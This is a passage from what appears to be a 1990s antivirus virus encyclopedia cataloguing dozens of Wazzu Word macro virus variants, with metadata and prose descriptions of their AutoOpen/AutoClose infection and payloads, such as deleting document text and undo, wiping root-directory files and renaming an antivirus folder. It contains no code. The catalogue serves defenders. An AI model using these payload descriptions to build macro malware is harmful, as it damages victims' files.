  26790. addresses from the MS Mail address book.
  26791.  
  26792. For further details, please refer to the Wazzu.A and
  26793. Sharefun.A virus description.
  26794.  
  26795. [WORD_Wazzu.AX]
  26796. Virus name: WORD_Wazzu.AX
  26797. Virus Type: Word macro virus
  26798. Number of macros: 1
  26799. Encrypted: No
  26800. Macro names: AutoOpen
  26801. Size of macros: 343 Bytes
  26802. Place of origin: USA
  26803. Date of origin: Spring 1997
  26804. Destructive: No
  26805. Common In-The-Wild: No
  26806. Description:
  26807.  
  26808. The main difference between this new variant and previous
  26809. Wazzu viruses is that Wazzu.AX is another "do-nothing" macro
  26810. virus with small code modifications and no payload.
  26811.  
  26812. It infects the global template when an infected document is
  26813. opened. Further documents become infected when they are also
  26814. opened (AutoOpen).
  26815.  
  26816. [WORD_Wazzu.AY]
  26817. Virus name: WORD_Wazzu.AY
  26818. Virus Type: Word macro virus
  26819. Number of macros: 1
  26820. Encrypted: No
  26821. Macro names: AutoOpen
  26822. Size of macros: 632 Bytes
  26823. Place of origin: Unknown
  26824. Date of origin: February 1997
  26825. Destructive: No
  26826. Common In-The-Wild: No
  26827. Description:
  26828.  
  26829. The main difference between this new variant and previous
  26830. Wazzu viruses is that Wazzu.AY is another "do-nothing" macro
  26831. virus with a corrupted payload and a 2-byte code modification.
  26832.  
  26833. It infects the global template when an infected document is
  26834. opened. Further documents become infected when they are also
  26835. opened (AutoOpen).
  26836.  
  26837. [WORD_Wazzu.AZ]
  26838. Virus name: WORD_Wazzu.AZ
  26839. Virus Type: Word macro virus
  26840. Number of macros: 1
  26841. Encrypted: No
  26842. Macro names: AutoClose
  26843. Size of macros: 659 Bytes
  26844. Place of origin: USA
  26845. Date of origin: February 1997
  26846. Destructive: Yes
  26847. Common In-The-Wild: No
  26848. Description:
  26849.  
  26850. The main difference between this new variant and previous
  26851. Wazzu viruses is that Wazzu.AZ has some code modifications.
  26852.  
  26853. Its payload inserts the word "uzzaw" (wazzu backwards).
  26854.  
  26855. Wazzu.AZ also uses the "AutoClose" macro instead of
  26856. "AutoOpen".  It infects the global template when an infected
  26857. document is closed.  Further documents become infected when
  26858. they are also closed (AutoClose).
  26859.  
  26860. [WORD_Wazzu.B]
  26861. Virus name: WORD_Wazzu.B
  26862. Virus Type: Word macro virus
  26863. Number of macros: 1
  26864. Encrypted: No
  26865. Macro names: AutoOpen
  26866. Size of macros: 697 Bytes
  26867. Place of origin: Unknown
  26868. Date of origin: 1996
  26869. Destructive: Yes
  26870. Common In-The-Wild: No
  26871. Description:
  26872.  
  26873. The difference between this new variant and the original
  26874. Wazzu.A virus is that Wazzu.B has an additional, unimportant,
  26875. virus comment.
  26876.  
  26877. For more information, please refer to the Wazzu.A virus
  26878. description.
  26879.  
  26880. [WORD_Wazzu.BA]
  26881. Virus name: WORD_Wazzu.BA
  26882. Virus Type: Word macro virus
  26883. Number of macros: 1
  26884. Encrypted: No
  26885. Macro names: AutoClose
  26886. Size of macros: 277 Bytes
  26887. Place of origin: USA
  26888. Date of origin: February 1997
  26889. Destructive: No
  26890. Common In-The-Wild: No
  26891. Description:
  26892.  
  26893. The main difference between this new variant and previous
  26894. Wazzu viruses is that Wazzu.BA has a slightly modified
  26895. code with no payload. It also uses the "AutoClose" macro
  26896. instead of "AutoOpen".
  26897.  
  26898. It infects the global template when an infected document is
  26899. closed. Further documents become infected when they are also
  26900. closed (AutoClose).
  26901.  
  26902.  
  26903. [WORD_Wazzu.BB]
  26904. Virus name: WORD_Wazzu.BB
  26905. Virus Type: Word macro virus
  26906. Number of macros: 1
  26907. Encrypted: No
  26908. Macro names: AutoOpen
  26909. Size of macros: 434 Bytes
  26910. Place of origin: Unknown
  26911. Date of origin: Spring 1997
  26912. Destructive: No
  26913. Common In-The-Wild: No
  26914. Description:
  26915.  
  26916. The main difference between this new variant and previous
  26917. Wazzu viruses is that Wazzu.BB is another "do-nothing" macro
  26918. virus with small code modifications and no payload.
  26919.  
  26920. It infects the global template when an infected document is
  26921. opened. Further documents become infected when they are also
  26922. opened (AutoOpen).
  26923.  
  26924. [WORD_Wazzu.BC]
  26925. Virus name: WORD_Wazzu.BC
  26926. Virus Type: Word macro virus
  26927. Number of macros: 1
  26928. Encrypted: No
  26929. Macro names: AutoOpen
  26930. Size of macros: 862 Bytes
  26931. Place of origin: Unknown
  26932. Date of origin: Spring 1997
  26933. Destructive: Yes
  26934. Common In-The-Wild: No
  26935. Description:
  26936.  
  26937. The main difference between this new variant and previous
  26938. Wazzu viruses is that Wazzu.BC targets an anti-virus
  26939. program in its payload.
  26940.  
  26941. It renames the default directory of VET (Australian product).
  26942.  
  26943. Wazzu.BC also contains other payloads where it moves words
  26944. and enters the following words to newly opened documents:
  26945. (probability differs in each case)
  26946.  
  26947. "   waffle   "
  26948.  
  26949. "   zoom   "
  26950.  
  26951. "   kill   "
  26952.  
  26953. "   mum   "
  26954.  
  26955.  
  26956. Wazzu.BC infects the global template when an infected
  26957. document is opened. Further documents become infected when
  26958. they are also opened (AutoOpen).
  26959.  
  26960. [WORD_Wazzu.BD]
  26961. Virus name: WORD_Wazzu.BD
  26962. Virus Type: Word macro virus
  26963. Number of macros: 1
  26964. Encrypted: Yes
  26965. Macro names: AutoOpen
  26966. Size of macros: 525 Bytes
  26967. Place of origin: Unknown
  26968. Date of origin: Spring 1997
  26969. Destructive: Yes
  26970. Common In-The-Wild: No
  26971. Description:
  26972.  
  26973. The main difference between this new variant and previous
  26974. Wazzu viruses is that Wazzu.BD selects all text of a newly
  26975. opened document and then deletes it.
  26976.  
  26977. Recovery is impossible since Wazzu.BD also removes the
  26978. EDIT|EDITUNDO menu item.
  26979.  
  26980. This payload triggers with a chance of 1/50.
  26981.  
  26982. Wazzu.BD also shows the following message:
  26983.  
  26984. "   Where do you want to go today   "
  26985.  
  26986. Wazzu.BD infects the global template when an infected
  26987. document is opened. Further documents become infected
  26988. when they are also opened (AutoOpen).
  26989.  
  26990. [WORD_Wazzu.BE]
  26991. Virus name: WORD_Wazzu.BE
  26992. Virus Type: Word macro virus
  26993. Number of macros: 1
  26994. Encrypted: No
  26995. Macro names: AutoOpen
  26996. Size of macros: 439 Bytes
  26997. Place of origin: Unknown
  26998. Date of origin: Spring 1997
  26999. Destructive: No
  27000. Common In-The-Wild: No
  27001. Description:
  27002.  
  27003. The main difference between this new variant and previous
  27004. Wazzu viruses is that Wazzu.BE shows the following
  27005. message during infection:
  27006.  
  27007. "   Wazzu n'est pas mort   "
  27008.  
  27009. Wazzu.BE infects the global template when an infected
  27010. document is opened. Further documents become infected
  27011. when they are also opened (AutoOpen).
  27012.  
  27013. [WORD_Wazzu.BF]
  27014. Virus name: WORD_Wazzu.BF
  27015. Virus Type: Word macro virus
  27016. Number of macros: 1
  27017. Encrypted: No
  27018. Macro names: AutoOpen
  27019. Size of macros: 334 Bytes
  27020. Place of origin: USA
  27021. Date of origin: Spring 1997
  27022. Destructive: No
  27023. Common In-The-Wild: No
  27024. Description:
  27025.  
  27026. The main difference between this new variant and previous
  27027. Wazzu viruses is that Wazzu.BF is another "do-nothing" macro
  27028. virus with small code modifications and no payload.
  27029.  
  27030. It infects the global template when an infected document is
  27031. opened. Further documents become infected when they are also
  27032. opened (AutoOpen).
  27033.  
  27034. [WORD_Wazzu.BG]
  27035. Virus name: WORD_Wazzu.BG
  27036. Virus Type: Word macro virus
  27037. Number of macros: 1
  27038. Encrypted: No
  27039. Macro names: AutoOpen
  27040. Size of macros: 432 Bytes
  27041. Place of origin: Unknown
  27042. Date of origin: Spring 1997
  27043. Destructive: No
  27044. Common In-The-Wild: No
  27045. Description:
  27046.  
  27047. The main difference between this new variant and previous
  27048. Wazzu viruses is that Wazzu.BG is another "do-nothing" macro
  27049. virus with no payload.
  27050.  
  27051. It infects the global template when an infected document is
  27052. opened. Further documents become infected when they are also
  27053. opened (AutoOpen).
  27054.  
  27055. [WORD_Wazzu.BH]
  27056. Virus name: WORD_Wazzu.BH
  27057. Virus Type: Word macro virus
  27058. Number of macros: 1
  27059. Encrypted: No
  27060. Macro names: AutoOpen
  27061. Size of macros: 472 Bytes
  27062. Place of origin: Unknown
  27063. Date of origin: Spring 1997
  27064. Payload: Yes
  27065. Common In-The-Wild: No
  27066. Description:
  27067.  
  27068. The main difference between this new variant and previous
  27069. Wazzu viruses is that Wazzu.BH tries to remove all text
  27070. from a newly opened document.
  27071.  
  27072. It does not remove the "Edit|Undo" option, thus users can
  27073. recover after the text disappears.
  27074.  
  27075. It infects the global template when an infected document is
  27076. opened. Further documents become infected when they are also
  27077. opened (AutoOpen).
  27078.  
  27079. [WORD_Wazzu.BI]
  27080. Virus name: WORD_Wazzu.BI
  27081. Virus Type: Word macro virus
  27082. Number of macros: 1
  27083. Encrypted: No
  27084. Macro names: AutoOpen
  27085. Size of macros: 361 Bytes
  27086. Place of origin: Unknown
  27087. Date of origin: Spring 1997
  27088. Destructive: No
  27089. Common In-The-Wild: No
  27090. Description:
  27091.  
  27092. The main difference between this new variant and previous
  27093. Wazzu viruses is that Wazzu.BI is another "do-nothing" macro
  27094. virus with some code modifications and no payload.
  27095.  
  27096. It infects the global template when an infected document is
  27097. opened. Further documents become infected when they are also
  27098. opened (AutoOpen).
  27099.  
  27100. [WORD_Wazzu.BJ]
  27101. Virus name: WORD_Wazzu.BJ
  27102. Virus Type: Word macro virus
  27103. Number of macros: 1
  27104. Encrypted: No
  27105. Macro names: AutoOpen
  27106. Size of macros: 299 Bytes
  27107. Place of origin: Unknown
  27108. Date of origin: Spring 1997
  27109. Destructive: No
  27110. Common In-The-Wild: No
  27111. Description:
  27112.  
  27113. The main difference between this new variant and previous
  27114. Wazzu viruses is that Wazzu.BJ is another "do-nothing" macro
  27115. virus with some code modifications and no payload.
  27116.  
  27117. It infects the global template when an infected document is
  27118. opened. Further documents become infected when they are also
  27119. opened (AutoOpen).
  27120.  
  27121. [WORD_Wazzu.BK]
  27122. Virus name: WORD_Wazzu.BK
  27123. Virus Type: Word macro virus
  27124. Number of macros: 1
  27125. Encrypted: No
  27126. Macro names: AutoOpen
  27127. Size of macros: 623 Bytes
  27128. Place of origin: Unknown
  27129. Date of origin: Spring 1997
  27130. Destructive: Yes
  27131. Common In-The-Wild: No
  27132. Description:
  27133.  
  27134. The main difference between this new variant and previous
  27135. Wazzu viruses is that Wazzu.BK has a slightly modified code.
  27136.  
  27137. It infects the global template when an infected document is
  27138. opened. Further documents become infected when they are also
  27139. opened (AutoOpen).
  27140.  
  27141. The payload is similar to the original Wazzu virus. For
  27142. additional information, please refer to the Wazzu.A virus
  27143. description.
  27144.  
  27145. [WORD_Wazzu.BL]
  27146. Virus name: WORD_Wazzu.BL
  27147. Virus Type: Word macro virus
  27148. Number of macros: 1
  27149. Encrypted: No
  27150. Macro names: AutoOpen
  27151. Size of macros: 678 Bytes
  27152. Place of origin: Unknown
  27153. Date of origin: Spring 1997
  27154. Destructive: Yes
  27155. Common In-The-Wild: No
  27156. Description:
  27157.  
  27158. The main difference between this new variant and previous
  27159. Wazzu viruses is that Wazzu.BL has a slightly modified code.
  27160.  
  27161. It infects the global template when an infected document is
  27162. opened. After infection of the global template, it fails to
  27163. infect other documents. Therefore, it is not likely to survive
  27164. in the wild.
  27165.  
  27166. [WORD_Wazzu.BM]
  27167. Virus name: WORD_Wazzu.BM
  27168. Virus Type: Word macro virus
  27169. Number of macros: 1
  27170. Encrypted: No
  27171. Macro names: AutoOpen
  27172. Size of macros: 296 Bytes
  27173. Place of origin: USA
  27174. Date of origin: Spring 1997
  27175. Destructive: No
  27176. Common In-The-Wild: No
  27177. Description:
  27178.  
  27179. The main difference between this new variant and previous
  27180. Wazzu viruses is that Wazzu.BM is another "do-nothing" macro
  27181. virus with modified codes and no payload.
  27182.  
  27183. It infects the global template when an infected document is
  27184. opened. Further documents become infected when they are also
  27185. opened (AutoOpen).
  27186.  
  27187. [WORD_Wazzu.BN]
  27188. Virus name: WORD_Wazzu.BN
  27189. Virus Type: Word macro virus
  27190. Number of macros: 1
  27191. Encrypted: No
  27192. Macro names: AutoOpen
  27193. Size of macros: 433 Bytes
  27194. Place of origin: Germany
  27195. Date of origin: Spring 1997
  27196. Destructive: No
  27197. Common In-The-Wild: No
  27198. Description:
  27199.  
  27200. The main difference between this new variant and previous
  27201. Wazzu viruses is that Wazzu.BN is another "do-nothing" macro
  27202. virus with modified codes and no payload.
  27203.  
  27204. It infects the global template when an infected document is
  27205. opened. Further documents become infected when they are also
  27206. opened (AutoOpen).
  27207.  
  27208. [WORD_Wazzu.BO]
  27209. Virus name: WORD_Wazzu.BO
  27210. Virus Type: Word macro virus
  27211. Number of macros: 1
  27212. Encrypted: Yes
  27213. Macro names: AutoOpen
  27214. Size of macros: 632 Bytes
  27215. Place of origin: Unknown
  27216. Date of origin: 1997
  27217. Destructive: Yes
  27218. Common In-The-Wild: No
  27219. Description:
  27220.  
  27221. The main difference between this new variant and previous
  27222. Wazzu viruses is that Wazzu.BO has a slightly corrupted code.
  27223.  
  27224. It infects the global template when an infected document is
  27225. opened. Further documents become infected when they are also
  27226. opened (AutoOpen).
  27227.  
  27228. The payload is similar to the original Wazzu virus. There is a
  27229. 3/5 chance that one word is moved to another position in the
  27230. active document.
  27231.  
  27232. [WORD_Wazzu.BP]
  27233. Virus name: WORD_Wazzu.BP
  27234. Virus Type: Word macro virus
  27235. Number of macros: 1
  27236. Encrypted: Yes
  27237. Macro names: AutoOpen
  27238. Size of macros: 289 Bytes
  27239. Place of origin: Unknown
  27240. Date of origin: Spring 1997
  27241. Destructive: No
  27242. Common In-The-Wild: No
  27243. Description:
  27244.  
  27245. The main difference between this new variant and previous
  27246. Wazzu viruses is that Wazzu.BP displays the following
  27247. message:
  27248.  
  27249. "   Leaving Traces of Wazzu Around the World...   "
  27250.  
  27251. Wazzu.BP infects the global template when an infected
  27252. document is opened. Further documents become infected
  27253. when they are also opened (AutoOpen).
  27254.  
  27255. [WORD_Wazzu.BQ]
  27256. Virus name: WORD_Wazzu.BQ
  27257. Virus Type: Word macro virus
  27258. Number of macros: 1
  27259. Encrypted: No
  27260. Macro names: AutoOpen
  27261. Size of macros: 670 Bytes
  27262. Place of origin: Unknown
  27263. Date of origin: Spring 1997
  27264. Destructive: Yes
  27265. Common In-The-Wild: No
  27266. Description:
  27267.  
  27268. The main difference between this new variant and previous
  27269. Wazzu viruses is that Wazzu.BQ has a slightly modified code.
  27270. It contains one additional virus author comment.
  27271.  
  27272. Wazzu.BQ infects the global template when an infected
  27273. document is opened. Further documents become infected
  27274. when they are also opened (AutoOpen).
  27275.  
  27276. The payload is similar to the original Wazzu virus. For
  27277. additional information, please refer to the Wazzu.A virus
  27278. description.
  27279.  
  27280. [WORD_Wazzu.BR]
  27281. Virus name: WORD_Wazzu.BR
  27282. Virus Type: Word macro virus
  27283. Number of macros: 1
  27284. Encrypted: No
  27285. Macro names: AutoOpen
  27286. Size of macros: 332 Bytes
  27287. Place of origin: Unknown
  27288. Date of origin: Spring 1997
  27289. Destructive: No
  27290. Common In-The-Wild: No
  27291. Description:
  27292.  
  27293. The main difference between this new variant and previous
  27294. Wazzu viruses is that Wazzu.BR is another "do-nothing" macro
  27295. virus with some code modifications and no payload.
  27296.  
  27297. It infects the global template when an infected document is
  27298. opened. Further documents become infected when they are also
  27299. opened (AutoOpen).
  27300.  
  27301. [WORD_Wazzu.BS]
  27302. Virus name: WORD_Wazzu.BS
  27303. Virus Type: Word macro virus
  27304. Number of macros: 1
  27305. Encrypted: No
  27306. Macro names: AutoOpen
  27307. Size of macros: 605 Bytes
  27308. Place of origin: France
  27309. Date of origin: Spring 1997
  27310. Destructive: Yes
  27311. Common In-The-Wild: No
  27312. Description:
  27313.  
  27314. The main difference between this new variant and previous
  27315. Wazzu viruses is that Wazzu.BS replaces the word "donc" with
  27316. the following:
  27317.  
  27318. "   Mon prof est con,   "
  27319.  
  27320. This occurs when a document is opened (probability: 3/4).
  27321.  
  27322. The second payload is similar to Wazzu.A, where one word
  27323. is moved from one position to another. For further details,
  27324. please refer to the Wazzu.A virus description.
  27325.  
  27326. Wazzu.BS infects the global template when an infected
  27327. document is opened. Further documents become infected
  27328. when they are also opened (AutoOpen).
  27329.  
  27330. [WORD_Wazzu.BU]
  27331. Virus name: WORD_Wazzu.BU
  27332. Virus Type: Word macro virus
  27333. Number of macros: 1
  27334. Encrypted: No
  27335. Macro names: AutoOpen
  27336. Size of macros: 148 Bytes
  27337. Place of origin: Unknown
  27338. Date of origin: Spring 1997
  27339. Destructive: No
  27340. Common In-The-Wild: No
  27341. Description:
  27342.  
  27343. The main difference between this new variant and previous
  27344. Wazzu viruses is that Wazzu.BU is another "do-nothing" macro
  27345. virus with some code modifications and no payload.
  27346.  
  27347. It infects the global template when an infected document is
  27348. opened. Further documents become infected when they are also
  27349. opened (AutoOpen).
  27350.  
  27351. [WORD_Wazzu.BV]
  27352. Virus name: WORD_Wazzu.BV
  27353. Virus Type: Word macro virus
  27354. Number of macros: 1
  27355. Encrypted: No
  27356. Macro names: AutoOpen
  27357. Size of macros: 152 Bytes
  27358. Place of origin: Unknown
  27359. Date of origin: Spring 1997
  27360. Destructive: No
  27361. Common In-The-Wild: No
  27362. Description:
  27363.  
  27364. The main difference between this new variant and previous
  27365. Wazzu viruses is that Wazzu.BV is another "do-nothing" macro
  27366. virus with some code modifications and no payload.
  27367.  
  27368. It infects the global template when an infected document is
  27369. opened. Further documents become infected when they are also
  27370. opened (AutoOpen).
  27371.  
  27372. [WORD_Wazzu.BW]
  27373. Virus name: WORD_Wazzu.BW
  27374. Virus Type: Word macro virus
  27375. Number of macros: 1
  27376. Encrypted: No
  27377. Macro names: AutoOpen
  27378. Size of macros: 158 Bytes
  27379. Place of origin: Unknown
  27380. Date of origin: Spring 1997
  27381. Destructive: No
  27382. Common In-The-Wild: No
  27383. Description:
  27384.  
  27385. The main difference between this new variant and previous
  27386. Wazzu viruses is that Wazzu.BW is another "do-nothing" macro
  27387. virus with some code modifications and no payload.
  27388.  
  27389. It infects the global template when an infected document is
  27390. opened. Further documents become infected when they are also
  27391. opened (AutoOpen).
  27392.  
  27393. [WORD_Wazzu.BX]
  27394. Virus name: WORD_Wazzu.BX
  27395. Virus Type: Word macro virus
  27396. Number of macros: 1
  27397. Encrypted: No
  27398. Macro names: AutoOpen
  27399. Size of macros: 345 Bytes
  27400. Place of origin: Unknown
  27401. Date of origin: Spring 1997
  27402. Destructive: No
  27403. Common In-The-Wild: No
  27404. Description:
  27405.  
  27406. The main difference between this new variant and previous
  27407. Wazzu viruses is that Wazzu.BX is another "do-nothing" macro
  27408. virus with some code modifications and no payload.
  27409.  
  27410. It infects the global template when an infected document is
  27411. opened. Further documents become infected when they are also
  27412. opened (AutoOpen).
  27413.  
  27414. [WORD_Wazzu.BY]
  27415. Virus name: WORD_Wazzu.BY
  27416. Virus Type: Word macro virus
  27417. Number of macros: 1
  27418. Encrypted: No
  27419. Macro names: AutoOpen
  27420. Size of macros: 277 Bytes
  27421. Place of origin: Unknown
  27422. Date of origin: Spring 1997
  27423. Destructive: No
  27424. Common In-The-Wild: No
  27425. Description:
  27426.  
  27427. The main difference between this new variant and previous
  27428. Wazzu viruses is that Wazzu.BY is another "do-nothing" macro
  27429. virus with some code modifications and no payload.
  27430.  
  27431. It infects the global template when an infected document is
  27432. opened. Further documents become infected when they are also
  27433. opened (AutoOpen).
  27434.  
  27435. [WORD_Wazzu.C]
  27436. Virus name: WORD_Wazzu.C
  27437. Virus Type: Word macro virus
  27438. Number of macros: 1
  27439. Encrypted: No
  27440. Macro names: autoOpen
  27441. Size of macros: 433 Bytes
  27442. Place of origin: Unknown
  27443. Date of origin: Summer 1996
  27444. Destructive: No
  27445. Common In-The-Wild: Yes
  27446. Description:
  27447.  
  27448. The difference between this new variant and the original
  27449. Wazzu.A virus is that Wazzu.C does not have any
  27450. destructive payload.  It is only infectious.
  27451.  
  27452. During the Spring of 1997, Wazzu.C was discovered in a Word97
  27453. document (Word8).
  27454.  
  27455. [WORD_Wazzu.CB]
  27456. Virus name: WORD_Wazzu.CB
  27457. Virus Type: Word macro virus
  27458. Number of macros: 1
  27459. Encrypted: No
  27460. Macro names: AutoOpen
  27461. Size of macros: 343 Bytes
  27462. Place of origin: Unknown
  27463. Date of origin: Spring 1997
  27464. Destructive: No
  27465. Common In-The-Wild: No
  27466. Description:
  27467.  
  27468. The main difference between this new variant and previous
  27469. Wazzu viruses is that Wazzu.CB is another "do-nothing" macro
  27470. virus with some corrupted codes and no payload.
  27471.  
  27472. It infects the global template when an infected document is
  27473. opened. Further documents become infected when they are also
  27474. opened (AutoOpen).
  27475.  
  27476. [WORD_Wazzu.D]
  27477. Virus name: WORD_Wazzu.D
  27478. Virus Type: Word macro virus
  27479. Number of macros: 1
  27480. Encrypted: No
  27481. Macro names: autoOpen
  27482. Size of macros: 331 Bytes
  27483. Place of origin: Unknown
  27484. Date of origin: Summer 1996
  27485. Destructive: No
  27486. Common In-The-Wild: No
  27487. Description:
  27488.  
  27489. The difference between this new variant and Wazzu.C is that
  27490. some unused codes are missing in Wazzu.D. The difference to
  27491. the original Wazzu is that it does not contain any destructive
  27492. payload, such as changing documents. Wazzu.D is only infectious.
  27493.  
  27494. [WORD_Wazzu.E]
  27495. Virus name: WORD_Wazzu.E
  27496. Virus Type: Word macro virus
  27497. Number of macros: 1
  27498. Encrypted: No
  27499. Macro names: autoOpen
  27500. Size of macros: 318 Bytes
  27501. Place of origin: Unknown
  27502. Date of origin: September 1996
  27503. Destructive: No
  27504. Common In-The-Wild: Yes
  27505. Description:
  27506.  
  27507. The difference between this new variant and Wazzu.D is that
  27508. some unused codes are missing in Wazzu.E. The difference to
  27509. the original Wazzu is that it does not contain any destructive
  27510. payload, such as changing documents. Wazzu.E is only infectious.
  27511.  
  27512. [WORD_Wazzu.F]
  27513. Virus name: WORD_Wazzu.F
  27514. Virus Type: Word macro virus
  27515. Number of macros: 1
  27516. Encrypted: Yes
  27517. Macro names: autoOpen
  27518. Size of macros: 450 Bytes
  27519. Place of origin: Unknown
  27520. Date of origin: September 1996
  27521. Destructive: No
  27522. Common In-The-Wild: Yes
  27523. Description:
  27524.  
  27525. Wazzu.F is a minor variant of Wazzu.C with two changes.
  27526. Wazzu.F displays a message with a 1/10 chance and its code
  27527. is encrypted.  The difference to the original Wazzu is that
  27528. Wazzu.F does not contain any destructive payload, such as
  27529. changing documents.  Wazzu.F is only infectious.
  27530.  
  27531. The following message is displayed with a 1/10 chance:
  27532.  
  27533. "   This one's for you, Bosco.   "
  27534.  
  27535. [WORD_Wazzu.G]
  27536. Virus name: WORD_Wazzu.G
  27537. Virus Type: Word macro virus
  27538. Number of macros: 1
  27539. Encrypted: No
  27540. Macro names: AutoOpen
  27541. Size of macros: 632 Bytes
  27542. Place of origin: Unknown
  27543. Date of origin: 1996
  27544. Destructive: Yes
  27545. Common In-The-Wild: No
  27546. Description:
  27547.  
  27548. The main difference between this new variant and previous
  27549. Wazzu viruses is that Wazzu.G has a slightly modified code.
  27550.  
  27551. It infects the global template when an infected document is
  27552. opened. Further documents become infected when they are also
  27553. opened (AutoOpen).
  27554.  
  27555. The payload is similar to the original Wazzu virus. There is a
  27556. 3/5 chance that one word is moved to another position in the
  27557. active document.
  27558.  
  27559. [WORD_Wazzu.H]
  27560. Virus name: WORD_Wazzu.H
  27561. Virus Type: Word macro virus
  27562. Number of macros: 1
  27563. Encrypted: Yes
  27564. Macro names: AutoOpen
  27565. Size of macros: 943 Bytes
  27566. Place of origin: Unknown
  27567. Date of origin: 1996
  27568. Destructive: Yes
  27569. Common In-The-Wild: Yes
  27570. Description:
  27571.  
  27572. Wazzu.H is a newly rewritten Wazzu variant. Each of its six
  27573. payloads triggers with a chance of 1/6.
  27574.  
  27575. One payload displays the following message:
  27576.  
  27577. "   Thank's for using Microsloth Warp for Windblowz   "
  27578.  
  27579. Other payloads create 20 new documents or delete all files in
  27580. the root directory (C:\*.*).
  27581.  
  27582. Wazzu.H infects the global template when an infected
  27583. document is opened. Further files become infected when they
  27584. are also opened (AutoOpen).
  27585.  
  27586. [WORD_Wazzu.I]
  27587. Virus name: WORD_Wazzu.I
  27588. Virus Type: Word macro virus
  27589. Number of macros: 1
  27590. Encrypted: No
  27591. Macro names: AutoOpen
  27592. Size of macros: 333 Bytes
  27593. Place of origin: Unknown
  27594. Date of origin: 1996
  27595. Destructive: No
  27596. Common In-The-Wild: No
  27597. Description:
  27598.  
  27599. The main difference between this new variant and previous
  27600. Wazzu viruses is that Wazzu.I is another "do-nothing" macro
  27601. virus with no payload and slightly modified code.
  27602.  
  27603. It infects the global template when an infected document is
  27604. opened. Further documents become infected when they are also
  27605. opened (AutoOpen).
  27606.  
  27607. [WORD_Wazzu.J]
  27608. Virus name: WORD_Wazzu.J
  27609. Virus Type: Word macro virus
  27610. Number of macros: 1
  27611. Encrypted: No
  27612. Macro names: AutoOpen
  27613. Size of macros: 675 Bytes
  27614. Place of origin: Unknown
  27615. Date of origin: 1996
  27616. Destructive: Yes
  27617. Common In-The-Wild: Yes
  27618. Description:
  27619.  
  27620. The difference between this new variant and the original
  27621. Wazzu.A virus is that some spaces have been deleted from
  27622. the macro virus code.
  27623.  
  27624. For more information, please refer to the Wazzu.A virus
  27625. description.
  27626.  
  27627. [WORD_Wazzu.K]
  27628. Virus name: WORD_Wazzu.K
  27629. Virus Type: Word macro virus
  27630. Number of macros: 1
  27631. Encrypted: No
  27632. Macro names: AutoOpen
  27633. Size of macros: 632 Bytes
  27634. Place of origin: Unknown
  27635. Date of origin: 1996
  27636. Destructive: No
  27637. Common In-The-Wild: No
  27638. Description:
  27639.  
  27640. The main difference between this new variant and previous
  27641. Wazzu viruses is that Wazzu.K is another "do-nothing" macro
  27642. virus with a corrupted payload and slightly modified code.
  27643.  
  27644. It infects the global template when an infected document is
  27645. opened. Further documents become infected when they are also
  27646. opened (AutoOpen).
  27647.  
  27648. [WORD_Wazzu.L]
  27649. Virus name: WORD_Wazzu.L
  27650. Virus Type: Word macro virus
  27651. Number of macros: 1
  27652. Encrypted: No
  27653. Macro names: AutoOpen
  27654. Size of macros: 347 Bytes
  27655. Place of origin: Unknown
  27656. Date of origin: 1996
  27657. Destructive: Yes
  27658. Common In-The-Wild: No
  27659. Description:
  27660.  
  27661. The main difference between this new variant and previous
  27662. Wazzu viruses is that Wazzu.L has some modified codes.
  27663.  
  27664. It infects the global template when an infected document is
  27665. opened. Further documents become infected when they are
  27666. also opened (AutoOpen).
  27667.  
  27668. When a user opens a document, Wazzu.L adds the following
  27669. text at the end of the document:
  27670.  
  27671. "   wazzu!   "
  27672.  
  27673. [WORD_Wazzu.M]
  27674. Virus name: WORD_Wazzu.M
  27675. Virus Type: Word macro virus
  27676. Number of macros: 1
  27677. Encrypted: No
  27678. Macro names: AutoOpen
  27679. Size of macros: 443 Bytes
  27680. Place of origin: Unknown
  27681. Date of origin: 1996
  27682. Destructive: No
  27683. Common In-The-Wild: No
  27684. Description:
  27685.  
  27686. The main difference between this new variant and previous
  27687. Wazzu viruses is that Wazzu.M is another "do-nothing" macro
  27688. virus with a corrupted payload and slightly modified code.
  27689.  
  27690. Due to the corruption, Word displays an error message.
  27691.  
  27692. It infects the global template when an infected document is
  27693. opened. Further documents become infected when they are also
  27694. opened (AutoOpen).
  27695.  
  27696. [WORD_Wazzu.N]
  27697. Virus name: WORD_Wazzu.N
  27698. Virus Type: Word macro virus
  27699. Number of macros: 1
  27700. Encrypted: No
  27701. Macro names: AutoOpen
  27702. Size of macros: 432 Bytes
  27703. Place of origin: Unknown
  27704. Date of origin: 1996
  27705. Destructive: Yes
  27706. Common In-The-Wild: No
  27707. Description:
  27708.  
  27709. The main difference between this new variant and previous
  27710. Wazzu viruses is that the code has been slightly modified.
  27711.  
  27712. It infects the global template when an infected document is
  27713. opened. Further documents become infected when they are also
  27714. opened (AutoOpen).
  27715.  
  27716. [WORD_Wazzu.O]
  27717. Virus name: WORD_Wazzu.O
  27718. Virus Type: Word macro virus
  27719. Number of macros: 1
  27720. Encrypted: No
  27721. Macro names: AutoOpen
  27722. Size of macros: 309 Bytes
  27723. Place of origin: Unknown
  27724. Date of origin: 1996
  27725. Destructive: No
  27726. Common In-The-Wild: Yes
  27727. Description:
  27728.  
  27729. The main difference between this new variant and previous
  27730. Wazzu viruses is that Wazzu.O is another "do-nothing" macro
  27731. virus with no payload.
  27732.  
  27733. It infects the global template when an infected document is
  27734. opened. Further documents become infected when they are also
  27735. opened (AutoOpen).
  27736.  
  27737. [WORD_Wazzu.P]
  27738. Virus name: WORD_Wazzu.P
  27739. Virus Type: Word macro virus
  27740. Number of macros: 1
  27741. Encrypted: No
  27742. Macro names: AutoOpen
  27743. Size of macros: 460 Bytes
  27744. Place of origin: Unknown
  27745. Date of origin: 1996
  27746. Destructive: No
  27747. Common In-The-Wild: Yes
  27748. Description:
  27749.  
  27750. The difference between this new variant and the original
  27751. Wazzu.A virus is that the payload has been deleted from the
  27752. code.
  27753.  
  27754. Wazzu.P is still able to infect the global template when an
  27755. infected document is opened. Further documents become
  27756. infected when they are also opened (AutoOpen).
  27757.  
  27758. [WORD_Wazzu.Q]
  27759. Virus name: WORD_Wazzu.Q
  27760. Virus Type: Word macro virus
  27761. Number of macros: 1
  27762. Encrypted: No
  27763. Macro names: AutoOpen
  27764. Size of macros: 331 Bytes
  27765. Place of origin: Unknown
  27766. Date of origin: 1996
  27767. Destructive: No
  27768. Common In-The-Wild: No
  27769. Description:
  27770.  
  27771. The main difference between this new variant and previous
  27772. Wazzu viruses is that Wazzu.Q is another "do-nothing" macro
  27773. virus with no payload and slightly modified code.
  27774.  
  27775. It infects the global template when an infected document is
  27776. opened. Further documents become infected when they are also
  27777. opened (AutoOpen).
